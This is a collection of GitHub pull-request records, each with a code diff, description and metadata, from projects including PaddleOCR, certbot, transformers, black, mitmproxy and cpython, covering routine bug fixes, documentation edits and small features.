招牌或者广告图中的艺术字是文本识别一个非常挑战的难题,因为艺术字中的单字和印刷体相比,变化非常大。如果需要识别的艺术字是在一个词典列表内,可以将改每个词典认为是一个待识别图像模板,通过通用图像检索识别系统解决识别问题。可以尝试使用PaddleClas的图像识别系统。 + <a name="PaddleOCR实战问题"></a> ## 【实战篇】PaddleOCR实战问题 @@ -713,7 +726,6 @@ src_im= cv2.cvtColor(np.asarray(img), cv2.COLOR_RGB2BGR) **A**:文字识别主要有CTC和Attention两种方式,基于CTC的算法有CRNN、Rosetta、StarNet,基于Attention的方法有RARE、其他的算法PaddleOCR里没有提供复现代码。论文的链接可以参考:[PaddleOCR文本识别算法教程文档](https://github.com/PaddlePaddle/PaddleOCR/blob/release/2.1/doc/doc_ch/algorithm_overview.md#%E6%96%87%E6%9C%AC%E8%AF%86%E5%88%AB%E7%AE%97%E6%B3%95) - ### Q3.1.73: 如何使用TensorRT加速PaddleOCR预测? **A**: 目前paddle的dygraph分支已经支持了python和C++ TensorRT预测的代码,python端inference预测时把参数[--use_tensorrt=True](https://github.com/PaddlePaddle/PaddleOCR/blob/3ec57e8df9263de6fa897e33d2d91bc5d0849ef3/tools/infer/utility.py#L37)即可, @@ -753,7 +765,6 @@ linux系统共享内存位于/dev/shm目录下,如果内存不足,可以清 建议从[这里](https://paddle-inference.readthedocs.io/en/latest/user_guides/download_lib.html#linux)下载支持mlkdnn的CPU预测库。 - <a name="数据集3"></a> ### 数据集
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/3143
2021-06-21T12:37:30Z
2021-06-23T08:35:34Z
2021-06-23T08:35:34Z
2021-06-23T08:35:34Z
3,761
PaddlePaddle/PaddleOCR
42,304
Bugfix: brew_update_formula.py
diff --git a/thefuck/rules/brew_update_formula.py b/thefuck/rules/brew_update_formula.py index 2100c23b9..6b4f798b8 100644 --- a/thefuck/rules/brew_update_formula.py +++ b/thefuck/rules/brew_update_formula.py @@ -5,7 +5,8 @@ def match(command): return ('update' in command.script and "Error: This command updates brew itself" in command.output - and "Use 'brew upgrade <formula>'" in command.output) + and "Use 'brew upgrade" in command.output + and "instead" in command.output) def get_new_command(command):
Sample command output is: Error: This command updates brew itself, and does not take formula names. Use 'brew upgrade thefuck' instead. This will never match the previous `"Use 'brew upgrade <formula>'" in command.output` test.
https://api.github.com/repos/nvbn/thefuck/pulls/710
2017-10-12T20:45:28Z
2017-10-15T14:39:54Z
2017-10-15T14:39:54Z
2023-01-05T21:10:31Z
153
nvbn/thefuck
30,573
Add an option to dns_rfc2136 plugin to specify an authorative base domain.
diff --git a/CHANGELOG.md b/CHANGELOG.md index ac7f34a09e8..2f699feecb3 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,7 +6,9 @@ Certbot adheres to [Semantic Versioning](https://semver.org/). ### Added -* +* dns_rfc2136 plugin now supports explicitly specifing an authorative + base domain for cases when the automatic method does not work (e.g. + Split horizon DNS) ### Changed diff --git a/certbot-dns-rfc2136/certbot_dns_rfc2136/__init__.py b/certbot-dns-rfc2136/certbot_dns_rfc2136/__init__.py index 12b360959ff..cebff2841d3 100644 --- a/certbot-dns-rfc2136/certbot_dns_rfc2136/__init__.py +++ b/certbot-dns-rfc2136/certbot_dns_rfc2136/__init__.py @@ -21,8 +21,8 @@ ----------- Use of this plugin requires a configuration file containing the target DNS -server and optional port that supports RFC 2136 Dynamic Updates, the name -of the TSIG key, the TSIG key secret itself and the algorithm used if it's +server, optional authorative domain and optional port that supports RFC 2136 Dynamic Updates, +the name of the TSIG key, the TSIG key secret itself and the algorithm used if it's different to HMAC-MD5. .. code-block:: ini @@ -33,6 +33,8 @@ dns_rfc2136_server = 192.0.2.1 # Target DNS port dns_rfc2136_port = 53 + # Authorative domain (optional, will try to auto-detect if missing) + dns_rfc2136_base_domain = example.com # TSIG key name dns_rfc2136_name = keyname. # TSIG key secret diff --git a/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136.py b/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136.py index 2061374e0e8..5db8c3020a3 100644 --- a/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136.py +++ b/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136.py @@ -79,25 +79,33 @@ def _cleanup(self, _domain, validation_name, validation): self._get_rfc2136_client().del_txt_record(validation_name, validation) def _get_rfc2136_client(self): + key = _RFC2136Key(self.credentials.conf('name'), + self.credentials.conf('secret'), + self.ALGORITHMS.get(self.credentials.conf('algorithm'), + dns.tsig.HMAC_MD5)) return _RFC2136Client(self.credentials.conf('server'), int(self.credentials.conf('port') or self.PORT), - self.credentials.conf('name'), - self.credentials.conf('secret'), - self.ALGORITHMS.get(self.credentials.conf('algorithm'), - dns.tsig.HMAC_MD5)) + key, + self.credentials.conf('base-domain')) +class _RFC2136Key(object): + def __init__(self, name, secret, algorithm): + self.name = name + self.secret = secret + self.algorithm = algorithm class _RFC2136Client(object): """ Encapsulates all communication with the target DNS server. """ - def __init__(self, server, port, key_name, key_secret, key_algorithm): + def __init__(self, server, port, base_domain, key): self.server = server self.port = port self.keyring = dns.tsigkeyring.from_text({ - key_name: key_secret + key.name: key.secret }) - self.algorithm = key_algorithm + self.algorithm = key.algorithm + self.base_domain = base_domain def add_txt_record(self, record_name, record_content, record_ttl): """ @@ -171,23 +179,33 @@ def del_txt_record(self, record_name, record_content): def _find_domain(self, record_name): """ - Find the closest domain with an SOA record for a given domain name. + If 'base_domain' option is specified check if the requested domain matches this base domain + and return it. If not explicitly specified find the closest domain with an SOA record for + the given domain name. - :param str record_name: The record name for which to find the closest SOA record. + :param str record_name: The record name for which to find the base domain. :returns: The domain, if found. :rtype: str :raises certbot.errors.PluginError: if no SOA record can be found. """ - domain_name_guesses = dns_common.base_domain_name_guesses(record_name) + if self.base_domain: + if not record_name.endswith(self.base_domain): + raise errors.PluginError('Requested domain {0} does not match specified base ' + 'domain {1}.' + .format(record_name, self.base_domain)) + else: + return self.base_domain + else: + domain_name_guesses = dns_common.base_domain_name_guesses(record_name) - # Loop through until we find an authoritative SOA record - for guess in domain_name_guesses: - if self._query_soa(guess): - return guess + # Loop through until we find an authoritative SOA record + for guess in domain_name_guesses: + if self._query_soa(guess): + return guess - raise errors.PluginError('Unable to determine base domain for {0} using names: {1}.' - .format(record_name, domain_name_guesses)) + raise errors.PluginError('Unable to determine base domain for {0} using names: {1}.' + .format(record_name, domain_name_guesses)) def _query_soa(self, domain_name): """ diff --git a/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136_test.py b/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136_test.py index d800f1ec7c2..bed3445b69e 100644 --- a/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136_test.py +++ b/certbot-dns-rfc2136/certbot_dns_rfc2136/dns_rfc2136_test.py @@ -73,9 +73,12 @@ def test_valid_algorithm_passes(self): class RFC2136ClientTest(unittest.TestCase): def setUp(self): - from certbot_dns_rfc2136.dns_rfc2136 import _RFC2136Client + from certbot_dns_rfc2136.dns_rfc2136 import _RFC2136Client, _RFC2136Key - self.rfc2136_client = _RFC2136Client(SERVER, PORT, NAME, SECRET, dns.tsig.HMAC_MD5) + self.rfc2136_client = _RFC2136Client(SERVER, + PORT, + None, + _RFC2136Key(NAME, SECRET, dns.tsig.HMAC_MD5)) @mock.patch("dns.query.tcp") def test_add_txt_record(self, query_mock): @@ -162,6 +165,28 @@ def test_find_domain_wraps_errors(self): self.rfc2136_client._find_domain, 'foo.bar.'+DOMAIN) + def test_find_domain_with_base(self): + # _query_soa | pylint: disable=protected-access + self.rfc2136_client._query_soa = mock.MagicMock(side_effect=[False, False, True]) + self.rfc2136_client.base_domain = 'bar.' + DOMAIN + + # _find_domain | pylint: disable=protected-access + domain = self.rfc2136_client._find_domain('foo.bar.' + DOMAIN) + + self.assertTrue(domain == 'bar.' + DOMAIN) + + def test_find_domain_with_wrong_base(self): + + # _query_soa | pylint: disable=protected-access + self.rfc2136_client._query_soa = mock.MagicMock(side_effect=[False, False, True]) + self.rfc2136_client.base_domain = 'wrong.' + DOMAIN + + self.assertRaises( + errors.PluginError, + # _find_domain | pylint: disable=protected-access + self.rfc2136_client._find_domain, + 'foo.bar.' + DOMAIN) + @mock.patch("dns.query.udp") def test_query_soa_found(self, query_mock): query_mock.return_value = mock.MagicMock(answer=[mock.MagicMock()], flags=dns.flags.AA)
Added an option to dns_rfc2136 plugin to explicitly specify the base domain for which the DNS server is authorative. This solves problems with split horizon DNS configurations which do not correctly report authorative SOA records when queried without a TSIG key. Could be useful for other use cases.
https://api.github.com/repos/certbot/certbot/pulls/7029
2019-05-06T13:05:29Z
2019-05-16T08:40:18Z
2019-05-16T08:40:18Z
2019-05-16T08:45:35Z
2,034
certbot/certbot
2,384
[CI] implement job skipping for doc-only PRs
diff --git a/.circleci/config.yml b/.circleci/config.yml index aedbe4f553985..f3b13d26eb524 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -3,6 +3,22 @@ orbs: gcp-gke: circleci/gcp-gke@1.0.4 go: circleci/go@1.3.0 +commands: + skip-job-on-doc-only-changes: + description: "Do not continue this job and exit with success for PRs with only doc changes" + steps: + + - run: + name: docs-only changes skip check + command: | + if git diff --name-only << pipeline.git.base_revision >>...<< pipeline.git.revision >> | egrep -qv '\.(md|rst)$' + then + echo "Non-docs were modified in this PR, proceeding normally" + else + echo "Only docs were modified in this PR, quitting this job" + circleci step halt + fi + # TPU REFERENCES references: checkout_ml_testing: &checkout_ml_testing @@ -72,6 +88,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-torch_and_tf-{{ checksum "setup.py" }} @@ -98,6 +115,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-torch-{{ checksum "setup.py" }} @@ -124,6 +142,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-tf-{{ checksum "setup.py" }} @@ -150,6 +169,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-flax-{{ checksum "setup.py" }} @@ -176,6 +196,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-torch-{{ checksum "setup.py" }} @@ -202,6 +223,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-tf-{{ checksum "setup.py" }} @@ -226,6 +248,7 @@ jobs: RUN_CUSTOM_TOKENIZERS: yes steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-custom_tokenizers-{{ checksum "setup.py" }} @@ -253,6 +276,7 @@ jobs: parallelism: 1 steps: - checkout + - skip-job-on-doc-only-changes - restore_cache: keys: - v0.4-torch_examples-{{ checksum "setup.py" }}
Let's save some time and money. This PR: * [x] skips most jobs when the only change is in `\.(md|rst)$` files. I tested this with various types of files and it seems to do the right thing. But if we merge let's monitor that I didn't miss some use case and we end up with broken master if some CI jobs didn't run. - pros: obvious - cons: I don't like that the skipped CI job status appear as completed normally, even though it didn't quite run. Let's hope circleci comes up with some better way of indicating that the job was skipped. --------------- how it was done: `git merge-base --fork-point master` to get the commit range didn't work at all, even though that's what we use for the `fixup` `Makefile` target. Other suggestions I found didn't work either. At the end I found https://circleci.com/docs/2.0/pipeline-variables/ to get the correct commit range: ``` git diff --name-only << pipeline.git.base_revision >>...<< pipeline.git.revision >> ``` and now all is good. **credits**: the `circle step halt` idea comes from this blog https://yu-ishikawa.medium.com/reusable-a-circleci-command-to-halt-if-no-changed-target-files-e87c6b0af82b @LysandreJik, @sgugger
https://api.github.com/repos/huggingface/transformers/pulls/8826
2020-11-27T21:43:37Z
2020-11-29T16:31:30Z
2020-11-29T16:31:30Z
2020-12-01T06:46:48Z
754
huggingface/transformers
12,824
Fix cache file length
diff --git a/CHANGES.md b/CHANGES.md index 9a9be4bbeae..e4240eacfca 100644 --- a/CHANGES.md +++ b/CHANGES.md @@ -18,6 +18,9 @@ <!-- Changes to how Black can be configured --> +- Shorten the length of the name of the cache file to fix crashes on file systems that + do not support long paths (#4176) + ### Packaging <!-- Changes to how Black is packaged, such as dependency requirements --> diff --git a/src/black/cache.py b/src/black/cache.py index cfdbc21e92a..35bddb573d2 100644 --- a/src/black/cache.py +++ b/src/black/cache.py @@ -13,6 +13,7 @@ from _black_version import version as __version__ from black.mode import Mode +from black.output import err if sys.version_info >= (3, 11): from typing import Self @@ -64,7 +65,13 @@ def read(cls, mode: Mode) -> Self: resolve the issue. """ cache_file = get_cache_file(mode) - if not cache_file.exists(): + try: + exists = cache_file.exists() + except OSError as e: + # Likely file too long; see #4172 and #4174 + err(f"Unable to read cache file {cache_file} due to {e}") + return cls(mode, cache_file) + if not exists: return cls(mode, cache_file) with cache_file.open("rb") as fobj: diff --git a/src/black/mode.py b/src/black/mode.py index 68919fb4901..128d2b9f108 100644 --- a/src/black/mode.py +++ b/src/black/mode.py @@ -192,6 +192,9 @@ class Deprecated(UserWarning): """Visible deprecation warning.""" +_MAX_CACHE_KEY_PART_LENGTH: Final = 32 + + @dataclass class Mode: target_versions: Set[TargetVersion] = field(default_factory=set) @@ -228,6 +231,19 @@ def get_cache_key(self) -> str: ) else: version_str = "-" + if len(version_str) > _MAX_CACHE_KEY_PART_LENGTH: + version_str = sha256(version_str.encode()).hexdigest()[ + :_MAX_CACHE_KEY_PART_LENGTH + ] + features_and_magics = ( + ",".join(sorted(f.name for f in self.enabled_features)) + + "@" + + ",".join(sorted(self.python_cell_magics)) + ) + if len(features_and_magics) > _MAX_CACHE_KEY_PART_LENGTH: + features_and_magics = sha256(features_and_magics.encode()).hexdigest()[ + :_MAX_CACHE_KEY_PART_LENGTH + ] parts = [ version_str, str(self.line_length), @@ -236,10 +252,7 @@ def get_cache_key(self) -> str: str(int(self.is_ipynb)), str(int(self.skip_source_first_line)), str(int(self.magic_trailing_comma)), - sha256( - (",".join(sorted(f.name for f in self.enabled_features))).encode() - ).hexdigest(), str(int(self.preview)), - sha256((",".join(sorted(self.python_cell_magics))).encode()).hexdigest(), + features_and_magics, ] return ".".join(parts) diff --git a/tests/test_black.py b/tests/test_black.py index 6dbe25a90b6..123ea0bb88a 100644 --- a/tests/test_black.py +++ b/tests/test_black.py @@ -44,6 +44,7 @@ from black import re_compile_maybe_verbose as compile_pattern from black.cache import FileData, get_cache_dir, get_cache_file from black.debug import DebugVisitor +from black.mode import Mode, Preview from black.output import color_diff, diff from black.report import Report @@ -2065,6 +2066,30 @@ def test_get_cache_dir( monkeypatch.setenv("BLACK_CACHE_DIR", str(workspace2)) assert get_cache_dir().parent == workspace2 + def test_cache_file_length(self) -> None: + cases = [ + DEFAULT_MODE, + # all of the target versions + Mode(target_versions=set(TargetVersion)), + # all of the features + Mode(enabled_features=set(Preview)), + # all of the magics + Mode(python_cell_magics={f"magic{i}" for i in range(500)}), + # all of the things + Mode( + target_versions=set(TargetVersion), + enabled_features=set(Preview), + python_cell_magics={f"magic{i}" for i in range(500)}, + ), + ] + for case in cases: + cache_file = get_cache_file(case) + # Some common file systems enforce a maximum path length + # of 143 (issue #4174). We can't do anything if the directory + # path is too long, but ensure the name of the cache file itself + # doesn't get too crazy. + assert len(cache_file.name) <= 96 + def test_cache_broken_file(self) -> None: mode = DEFAULT_MODE with cache_dir() as workspace:
- Ensure total file length stays under 96 - Hash the path only if it's too long - Proceed normally (with a warning) if the cache can't be read Fixes #4172 <!-- Hello! Thanks for submitting a PR. To help make things go a bit more smoothly we would appreciate that you go through this template. --> ### Description <!-- Good things to put here include: reasoning for the change (please link any relevant issues!), any noteworthy (or hacky) choices to be aware of, or what the problem resolved here looked like ... we won't mind a ranty story :) --> ### Checklist - did you ... <!-- If any of the following items aren't relevant for your contribution please still tick them so we know you've gone through the checklist. All user-facing changes should get an entry. Otherwise, signal to us this should get the magical label to silence the CHANGELOG entry check. Tests are required for bugfixes and new features. Documentation changes are necessary for formatting and most enhancement changes. --> - [ ] Add an entry in `CHANGES.md` if necessary? - [ ] Add / update tests if necessary? - [ ] Add new / update outdated documentation? <!-- Just as a reminder, everyone in all psf/black spaces including PRs must follow the PSF Code of Conduct (link below). Finally, once again thanks for your time and effort. If you have any feedback in regards to your experience contributing here, please let us know! Helpful links: PSF COC: https://www.python.org/psf/conduct/ Contributing docs: https://black.readthedocs.io/en/latest/contributing/index.html Chat on Python Discord: https://discord.gg/RtVdv86PrH -->
https://api.github.com/repos/psf/black/pulls/4176
2024-01-26T15:38:51Z
2024-01-26T19:54:49Z
2024-01-26T19:54:49Z
2024-01-26T19:54:54Z
1,171
psf/black
23,909
MNT fix generate_authors_table.py
diff --git a/build_tools/generate_authors_table.py b/build_tools/generate_authors_table.py index 81e99856c6890..eaad1df75475c 100644 --- a/build_tools/generate_authors_table.py +++ b/build_tools/generate_authors_table.py @@ -11,6 +11,7 @@ import getpass import time from pathlib import Path +from os import path print("user:", file=sys.stderr) user = input() @@ -18,7 +19,7 @@ auth = (user, passwd) LOGO_URL = 'https://avatars2.githubusercontent.com/u/365630?v=4' -REPO_FOLDER = Path(__file__).parent.parent +REPO_FOLDER = Path(path.abspath(__file__)).parent.parent def get(url): @@ -100,7 +101,6 @@ def get_profile(login): 'Duchesnay': 'Edouard Duchesnay', 'Lars': 'Lars Buitinck', 'MechCoder': 'Manoj Kumar', - 'jeremiedbb': 'Jérémie Du Boisberranger', } if profile["name"] in missing_names: profile["name"] = missing_names[profile["name"]] diff --git a/doc/authors.rst b/doc/authors.rst index 6a03871d67e90..7b5426fe3128d 100644 --- a/doc/authors.rst +++ b/doc/authors.rst @@ -7,7 +7,7 @@ </style> <div> <a href='https://github.com/jeremiedbb'><img src='https://avatars2.githubusercontent.com/u/34657725?v=4' class='avatar' /></a> <br /> - <p>Jérémie Du Boisberranger</p> + <p>Jérémie du Boisberranger</p> </div> <div> <a href='https://github.com/jorisvandenbossche'><img src='https://avatars2.githubusercontent.com/u/1020496?v=4' class='avatar' /></a> <br />
A part of #17010. I think we should also either put @cmarmo in the authors list, or have a triage team section.
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/17011
2020-04-23T09:08:25Z
2020-04-27T14:12:30Z
2020-04-27T14:12:30Z
2020-04-27T18:31:16Z
477
scikit-learn/scikit-learn
46,800
Add NBP currency exchange rates API
diff --git a/README.md b/README.md index af59232146..25221681ea 100644 --- a/README.md +++ b/README.md @@ -231,6 +231,7 @@ API | Description | Auth | HTTPS | CORS | | [Exchangeratesapi.io](https://exchangeratesapi.io) | Exchange rates with currency conversion | No | Yes | Yes | | [Fixer.io](http://fixer.io) | Exchange rates and currency conversion | `apiKey` | Yes | Unknown | | [Frankfurter](https://www.frankfurter.app/docs) | Exchange rates, currency conversion and time series | No | Yes | Yes | +| [National Bank of Poland](http://api.nbp.pl/en.html) | A collection of currency exchange rates (data in XML and JSON) | No | Yes | Yes | | [ratesapi](https://ratesapi.io) | Free exchange rates and historical rates | No | Yes | Unknown | | [VATComply.com](https://www.vatcomply.com/documentation) | Exchange rates, geolocation and VAT number validation | No | Yes | Yes |
Add NBP (National Bank of Poland) currency exchange rates API <!-- Thank you for taking the time to work on a Pull Request for this project! --> <!-- To ensure your PR is dealt with swiftly please check the following: --> - [x] My submission is formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md) - [x] My addition is ordered alphabetically - [x] My submission has a useful description - [x] The description does not end with punctuation - [x] Each table column is padded with one space on either side - [x] I have searched the repository for any relevant issues or pull requests - [x] Any category I am creating has the minimum requirement of 3 items - [x] All changes have been [squashed][squash-link] into a single commit [squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
https://api.github.com/repos/public-apis/public-apis/pulls/1630
2021-04-10T20:41:52Z
2021-04-29T07:15:17Z
2021-04-29T07:15:17Z
2021-04-29T07:15:17Z
246
public-apis/public-apis
35,477
Bug fix: export alignement.json file with save-interval option.
diff --git a/scripts/extract.py b/scripts/extract.py index 4f81ef7f12..4ca7e32489 100644 --- a/scripts/extract.py +++ b/scripts/extract.py @@ -191,7 +191,7 @@ def run_extraction(self): if self.extractor.final_pass: self.output_processing(faces, align_eyes, size, filename) self.output_faces(filename, faces) - if self.save_interval and idx + 1 % self.save_interval == 0: + if self.save_interval and (idx + 1) % self.save_interval == 0: self.alignments.save() else: del faces["image"]
One-liner fix. The modulo operation has priority over the addition. Because parentheses were missing in the condition, the condition was never met. Because of this, even if we run the extract script with the `save-interval` option, the alignements.json file is never generated. Fixes https://github.com/deepfakes/faceswap/issues/739
https://api.github.com/repos/deepfakes/faceswap/pulls/740
2019-05-30T13:58:51Z
2019-05-30T14:32:57Z
2019-05-30T14:32:57Z
2019-05-30T14:32:57Z
150
deepfakes/faceswap
18,795
Fixing a typo ("termnial" -> "terminal")
diff --git a/docs/source/getting_started/example_scenes.rst b/docs/source/getting_started/example_scenes.rst index 7df94b643d..e51621c58f 100644 --- a/docs/source/getting_started/example_scenes.rst +++ b/docs/source/getting_started/example_scenes.rst @@ -23,7 +23,7 @@ InteractiveDevlopment self.play(ShowCreation(square)) self.wait() - # This opens an iPython termnial where you can keep writing + # This opens an iPython terminal where you can keep writing # lines as if they were part of this construct method. # In particular, 'square', 'circle' and 'self' will all be # part of the local namespace in that terminal. diff --git a/example_scenes.py b/example_scenes.py index a871915f9e..d297ca335d 100644 --- a/example_scenes.py +++ b/example_scenes.py @@ -593,7 +593,7 @@ def construct(self): self.play(ShowCreation(square)) self.wait() - # This opens an iPython termnial where you can keep writing + # This opens an iPython terminal where you can keep writing # lines as if they were part of this construct method. # In particular, 'square', 'circle' and 'self' will all be # part of the local namespace in that terminal.
## Motivation I fixed a typo in the documentation ## Proposed changes I fixed a single typo "termnial" in the documentation. ## Test It is a documentation change
https://api.github.com/repos/3b1b/manim/pulls/1872
2022-09-30T20:29:41Z
2022-10-01T08:07:09Z
2022-10-01T08:07:09Z
2022-10-01T08:07:09Z
322
3b1b/manim
18,507
Fix #3002. Auto-expanding for tilda.
diff --git a/mitmproxy/addons/cut.py b/mitmproxy/addons/cut.py index 7d9a1f361b..6bb52e844a 100644 --- a/mitmproxy/addons/cut.py +++ b/mitmproxy/addons/cut.py @@ -1,6 +1,8 @@ import io import csv import typing +import os.path + from mitmproxy import command from mitmproxy import exceptions from mitmproxy import flow @@ -87,7 +89,8 @@ def save( append = False if path.startswith("+"): append = True - path = mitmproxy.types.Path(path[1:]) + epath = os.path.expanduser(path[1:]) + path = mitmproxy.types.Path(epath) try: if len(cuts) == 1 and len(flows) == 1: with open(path, "ab" if append else "wb") as fp: diff --git a/mitmproxy/addons/view.py b/mitmproxy/addons/view.py index 6da17b5bdc..beaadcc6de 100644 --- a/mitmproxy/addons/view.py +++ b/mitmproxy/addons/view.py @@ -10,7 +10,6 @@ """ import collections import typing -import os import blinker import sortedcontainers @@ -359,9 +358,8 @@ def load_file(self, path: mitmproxy.types.Path) -> None: """ Load flows into the view, without processing them with addons. """ - spath = os.path.expanduser(path) try: - with open(spath, "rb") as f: + with open(path, "rb") as f: for i in io.FlowReader(f).stream(): # Do this to get a new ID, so we can load the same file N times and # get new flows each time. It would be more efficient to just have a diff --git a/mitmproxy/types.py b/mitmproxy/types.py index 2d66bb8ec1..23320c1213 100644 --- a/mitmproxy/types.py +++ b/mitmproxy/types.py @@ -178,7 +178,7 @@ def completion(self, manager: _CommandBase, t: type, start: str) -> typing.Seque return ret def parse(self, manager: _CommandBase, t: type, s: str) -> str: - return s + return os.path.expanduser(s) def is_valid(self, manager: _CommandBase, typ: typing.Any, val: typing.Any) -> bool: return isinstance(val, str) diff --git a/test/mitmproxy/test_types.py b/test/mitmproxy/test_types.py index 72492fa9a8..aafddef19b 100644 --- a/test/mitmproxy/test_types.py +++ b/test/mitmproxy/test_types.py @@ -2,6 +2,7 @@ import os import typing import contextlib +from unittest import mock from mitmproxy.test import tutils import mitmproxy.exceptions @@ -69,7 +70,10 @@ def test_path(): b = mitmproxy.types._PathType() assert b.parse(tctx.master.commands, mitmproxy.types.Path, "/foo") == "/foo" assert b.parse(tctx.master.commands, mitmproxy.types.Path, "/bar") == "/bar" + with mock.patch.dict("os.environ", {"HOME": "/home/test"}): + assert b.parse(tctx.master.commands, mitmproxy.types.Path, "~/mitm") == "/home/test/mitm" assert b.is_valid(tctx.master.commands, mitmproxy.types.Path, "foo") is True + assert b.is_valid(tctx.master.commands, mitmproxy.types.Path, "~/mitm") is True assert b.is_valid(tctx.master.commands, mitmproxy.types.Path, 3) is False def normPathOpts(prefix, match):
While I am sorting out in #3074 I decide to try to warm up :grinning: The list of all commands, which work with path https://github.com/mitmproxy/mitmproxy/issues/3002#issuecomment-374228453
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/3078
2018-04-25T23:03:34Z
2018-04-26T09:02:11Z
2018-04-26T09:02:11Z
2018-06-01T17:52:14Z
883
mitmproxy/mitmproxy
27,414
bpo-32499: Add dataclasses.is_dataclass(obj), which returns True if obj is a dataclass or an instance of one.
diff --git a/Lib/dataclasses.py b/Lib/dataclasses.py index eaaed63ef2826e..b4786bf502e8c6 100644 --- a/Lib/dataclasses.py +++ b/Lib/dataclasses.py @@ -16,6 +16,7 @@ 'astuple', 'make_dataclass', 'replace', + 'is_dataclass', ] # Raised when an attempt is made to modify a frozen class. @@ -615,11 +616,17 @@ def fields(class_or_instance): return tuple(f for f in fields.values() if f._field_type is _FIELD) -def _isdataclass(obj): +def _is_dataclass_instance(obj): """Returns True if obj is an instance of a dataclass.""" return not isinstance(obj, type) and hasattr(obj, _MARKER) +def is_dataclass(obj): + """Returns True if obj is a dataclass or an instance of a + dataclass.""" + return hasattr(obj, _MARKER) + + def asdict(obj, *, dict_factory=dict): """Return the fields of a dataclass instance as a new dictionary mapping field names to field values. @@ -639,12 +646,12 @@ class C: dataclass instances. This will also look into built-in containers: tuples, lists, and dicts. """ - if not _isdataclass(obj): + if not _is_dataclass_instance(obj): raise TypeError("asdict() should be called on dataclass instances") return _asdict_inner(obj, dict_factory) def _asdict_inner(obj, dict_factory): - if _isdataclass(obj): + if _is_dataclass_instance(obj): result = [] for f in fields(obj): value = _asdict_inner(getattr(obj, f.name), dict_factory) @@ -678,12 +685,12 @@ class C: tuples, lists, and dicts. """ - if not _isdataclass(obj): + if not _is_dataclass_instance(obj): raise TypeError("astuple() should be called on dataclass instances") return _astuple_inner(obj, tuple_factory) def _astuple_inner(obj, tuple_factory): - if _isdataclass(obj): + if _is_dataclass_instance(obj): result = [] for f in fields(obj): value = _astuple_inner(getattr(obj, f.name), tuple_factory) @@ -751,7 +758,7 @@ class C: # We're going to mutate 'changes', but that's okay because it's a new # dict, even if called with 'replace(obj, **my_changes)'. - if not _isdataclass(obj): + if not _is_dataclass_instance(obj): raise TypeError("replace() should be called on dataclass instances") # It's an error to have init=False fields in 'changes'. diff --git a/Lib/test/test_dataclasses.py b/Lib/test/test_dataclasses.py index ed6956398827b4..fca384d8c3c06c 100755 --- a/Lib/test/test_dataclasses.py +++ b/Lib/test/test_dataclasses.py @@ -1,6 +1,6 @@ from dataclasses import ( dataclass, field, FrozenInstanceError, fields, asdict, astuple, - make_dataclass, replace, InitVar, Field, MISSING + make_dataclass, replace, InitVar, Field, MISSING, is_dataclass, ) import pickle @@ -1365,27 +1365,32 @@ class C: self.assertIs(C().x, int) - def test_isdataclass(self): - # There is no isdataclass() helper any more, but the PEP - # describes how to write it, so make sure that works. Note - # that this version returns True for both classes and - # instances. - def isdataclass(obj): - try: - fields(obj) - return True - except TypeError: - return False + def test_is_dataclass(self): + class NotDataClass: + pass - self.assertFalse(isdataclass(0)) - self.assertFalse(isdataclass(int)) + self.assertFalse(is_dataclass(0)) + self.assertFalse(is_dataclass(int)) + self.assertFalse(is_dataclass(NotDataClass)) + self.assertFalse(is_dataclass(NotDataClass())) @dataclass class C: x: int - self.assertTrue(isdataclass(C)) - self.assertTrue(isdataclass(C(0))) + @dataclass + class D: + d: C + e: int + + c = C(10) + d = D(c, 4) + + self.assertTrue(is_dataclass(C)) + self.assertTrue(is_dataclass(c)) + self.assertFalse(is_dataclass(c.x)) + self.assertTrue(is_dataclass(d.d)) + self.assertFalse(is_dataclass(d.e)) def test_helper_fields_with_class_instance(self): # Check that we can call fields() on either a class or instance, diff --git a/Misc/NEWS.d/next/Library/2018-01-06-10-54-16.bpo-32499.koyY-4.rst b/Misc/NEWS.d/next/Library/2018-01-06-10-54-16.bpo-32499.koyY-4.rst new file mode 100644 index 00000000000000..bf3e99c8d861cf --- /dev/null +++ b/Misc/NEWS.d/next/Library/2018-01-06-10-54-16.bpo-32499.koyY-4.rst @@ -0,0 +1,2 @@ +Add dataclasses.is_dataclass(obj), which returns True if obj is a dataclass +or an instance of one.
<!-- issue-number: bpo-32499 --> https://bugs.python.org/issue32499 <!-- /issue-number -->
https://api.github.com/repos/python/cpython/pulls/5113
2018-01-06T15:57:00Z
2018-01-06T17:41:53Z
2018-01-06T17:41:53Z
2018-01-06T17:41:57Z
1,304
python/cpython
3,798
Update get_youtube_view.py
